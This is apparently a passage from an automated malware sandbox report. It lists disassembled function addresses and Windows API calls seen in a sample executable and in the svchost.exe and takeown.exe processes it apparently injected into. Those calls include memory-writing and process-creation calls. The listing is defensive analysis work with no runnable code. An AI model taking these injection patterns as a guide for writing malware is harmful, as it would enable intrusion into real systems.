                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_035B2E80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_035B2D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_035B2D30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2DD0 NtDelayExecution,LdrInitializeThunk,10_2_035B2DD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_035B2DF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_035B2C70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2C60 NtCreateKey,LdrInitializeThunk,10_2_035B2C60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_035B2CA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B35C0 NtCreateMutant,LdrInitializeThunk,10_2_035B35C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B39B0 NtGetContextThread,LdrInitializeThunk,10_2_035B39B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2B80 NtQueryInformationFile,10_2_035B2B80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2AB0 NtWaitForSingleObject,10_2_035B2AB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2F60 NtCreateProcessEx,10_2_035B2F60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2F90 NtProtectVirtualMemory,10_2_035B2F90
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2FA0 NtQuerySection,10_2_035B2FA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2E30 NtWriteVirtualMemory,10_2_035B2E30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2EA0 NtAdjustPrivilegesToken,10_2_035B2EA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2D00 NtSetInformationFile,10_2_035B2D00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2DB0 NtEnumerateKey,10_2_035B2DB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2C00 NtQueryInformationProcess,10_2_035B2C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2CC0 NtQueryVirtualMemory,10_2_035B2CC0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2CF0 NtOpenProcess,10_2_035B2CF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B3010 NtOpenDirectoryObject,10_2_035B3010
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B3090 NtSetValueKey,10_2_035B3090
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B3D70 NtOpenThread,10_2_035B3D70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B3D10 NtOpenProcessToken,10_2_035B3D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E28F60 NtCreateFile,10_2_02E28F60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E29260 NtClose,10_2_02E29260
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E293C0 NtAllocateVirtualMemory,10_2_02E293C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E290D0 NtReadFile,10_2_02E290D0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E291C0 NtDeleteFile,10_2_02E291C0
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00B6A1EF
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B58310
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B651BD
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B0E6A00_2_00B0E6A0
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B2D9750_2_00B2D975
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B0FCE00_2_00B0FCE0
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B221C50_2_00B221C5
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B362D20_2_00B362D2
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B803DA0_2_00B803DA
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B3242E0_2_00B3242E
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B225FA0_2_00B225FA
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B166E10_2_00B166E1
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B5E6160_2_00B5E616
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B3878F0_2_00B3878F
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B688890_2_00B68889
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B188080_2_00B18808
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B808570_2_00B80857
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B368440_2_00B36844
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B2CB210_2_00B2CB21
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B36DB60_2_00B36DB6
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B16F9E0_2_00B16F9E
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B130300_2_00B13030
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B231870_2_00B23187
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B2F1D90_2_00B2F1D9
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B012870_2_00B01287
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B214840_2_00B21484
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B155200_2_00B15520
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B276960_2_00B27696
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B157600_2_00B15760
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B219780_2_00B21978
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B39AB50_2_00B39AB5
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B2BDA60_2_00B2BDA6
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B21D900_2_00B21D90
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B87DDB0_2_00B87DDB
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B13FE00_2_00B13FE0
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B0DF000_2_00B0DF00
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_035636300_2_03563630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005081333_2_00508133
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F286F3_2_004F286F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F28703_2_004F2870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004FF8F33_2_004FF8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0051E8B33_2_0051E8B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F11D03_2_004F11D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_005063533_2_00506353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0050634F3_2_0050634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004FDB033_2_004FDB03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004FFB133_2_004FFB13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F43943_2_004F4394
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004FDC473_2_004FDC47
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004FDC533_2_004FDC53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F25503_2_004F2550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004F2D703_2_004F2D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00507E773_2_00507E77
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FA3523_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_032003E63_2_032003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314E3F03_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E02743_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C02C03_2_031C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DA1183_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031301003_2_03130100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031C81583_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_032001AA3_2_032001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F41A23_2_031F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F81CC3_2_031F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D20003_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031647503_2_03164750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031407703_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313C7C03_2_0313C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315C6E03_2_0315C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031405353_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_032005913_2_03200591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E44203_2_031E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F24463_2_031F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031EE4F63_2_031EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FAB403_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F6BD73_2_031F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313EA803_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031569623_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0320A9A63_2_0320A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314A8403_2_0314A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031268B83_2_031268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0316E8F03_2_0316E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03160F303_2_03160F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E2F303_2_031E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03182F283_2_03182F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B4F403_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031BEFA03_2_031BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03132FC83_2_03132FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314CFE03_2_0314CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FEE263_2_031FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03140E593_2_03140E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03152E903_2_03152E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FCE933_2_031FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FEEDB3_2_031FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DCD1F3_2_031DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314AD003_2_0314AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03158DBF3_2_03158DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0313ADE03_2_0313ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03140C003_2_03140C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E0CB53_2_031E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03130CF23_2_03130CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F132D3_2_031F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312D34C3_2_0312D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0318739A3_2_0318739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031452A03_2_031452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315B2C03_2_0315B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E12ED3_2_031E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0320B16B3_2_0320B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0312F1723_2_0312F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0317516C3_2_0317516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0314B1B03_2_0314B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031EF0CC3_2_031EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F70E93_2_031F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FF0E03_2_031FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FF7B03_2_031FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031856303_2_03185630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F16CC3_2_031F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F75713_2_031F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031DD5B03_2_031DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_032095C33_2_032095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FF43F3_2_031FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031314603_2_03131460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FFB763_2_031FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315FB803_2_0315FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B5BF03_2_031B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0317DBF93_2_0317DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FFA493_2_031FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F7A463_2_031F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B3A6C3_2_031B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03185AA03_2_03185AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031E1AA33_2_031E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031EDAC63_2_031EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031D59103_2_031D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031499503_2_03149950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315B9503_2_0315B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031AD8003_2_031AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031438E03_2_031438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FFF093_2_031FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03141F923_2_03141F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FFFB13_2_031FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03149EB03_2_03149EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F1D5A3_2_031F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03143D403_2_03143D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031F7D733_2_031F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0315FDC03_2_0315FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031B9C323_2_031B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031FFCF23_2_031FFCF2
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE9B8E9_2_03AE9B8E
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AF03CE9_2_03AF03CE
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AF03CA9_2_03AF03CA
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE7B7E9_2_03AE7B7E
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03B0892E9_2_03B0892E
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE996E9_2_03AE996E
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE7CCE9_2_03AE7CCE
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03AE7CC29_2_03AE7CC2
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_03ADE40F9_2_03ADE40F
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_0847B9589_2_0847B958
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_0849A9189_2_0849A918
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_084841989_2_08484198
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_08480AF89_2_08480AF8
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_08479B689_2_08479B68
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_0847BB789_2_0847BB78
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_084703F99_2_084703F9
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_084823B89_2_084823B8
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_084823B49_2_084823B4
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_08479CAC9_2_08479CAC
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 9_2_08479CB89_2_08479CB8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363A35210_2_0363A352
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036403E610_2_036403E6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0358E3F010_2_0358E3F0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0362027410_2_03620274
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036002C010_2_036002C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0360815810_2_03608158
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0357010010_2_03570100
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0361A11810_2_0361A118
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036381CC10_2_036381CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036401AA10_2_036401AA
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0361200010_2_03612000
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035A475010_2_035A4750
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0358077010_2_03580770
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0357C7C010_2_0357C7C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0359C6E010_2_0359C6E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0358053510_2_03580535
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0364059110_2_03640591
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363244610_2_03632446
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0362442010_2_03624420
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0362E4F610_2_0362E4F6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363AB4010_2_0363AB40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03636BD710_2_03636BD7
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0357EA8010_2_0357EA80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0359696210_2_03596962
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0364A9A610_2_0364A9A6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0358A84010_2_0358A840
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035AE8F010_2_035AE8F0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035668B810_2_035668B8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035F4F4010_2_035F4F40
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03622F3010_2_03622F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035A0F3010_2_035A0F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035C2F2810_2_035C2F28
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03572FC810_2_03572FC8
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0358CFE010_2_0358CFE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035FEFA010_2_035FEFA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03580E5910_2_03580E59
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363EE2610_2_0363EE26
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363EEDB10_2_0363EEDB
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03592E9010_2_03592E90
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363CE9310_2_0363CE93
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0358AD0010_2_0358AD00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0361CD1F10_2_0361CD1F
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0357ADE010_2_0357ADE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03598DBF10_2_03598DBF
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03580C0010_2_03580C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03570CF210_2_03570CF2
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03620CB510_2_03620CB5
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0356D34C10_2_0356D34C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363132D10_2_0363132D
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035C739A10_2_035C739A
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036212ED10_2_036212ED
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0359B2C010_2_0359B2C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035852A010_2_035852A0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0364B16B10_2_0364B16B
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0356F17210_2_0356F172
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B516C10_2_035B516C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0358B1B010_2_0358B1B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363F0E010_2_0363F0E0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036370E910_2_036370E9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0362F0CC10_2_0362F0CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363F7B010_2_0363F7B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036316CC10_2_036316CC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363757110_2_03637571
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0361D5B010_2_0361D5B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0357146010_2_03571460
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363F43F10_2_0363F43F
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363FB7610_2_0363FB76
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035BDBF910_2_035BDBF9
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035F5BF010_2_035F5BF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0359FB8010_2_0359FB80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03637A4610_2_03637A46
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0363FA4910_2_0363FA49
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035F3A6C10_2_035F3A6C
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_0362DAC610_2_0362DAC6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_03621AA310_2_03621AA3
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035C5AA010_2_035C5AA0
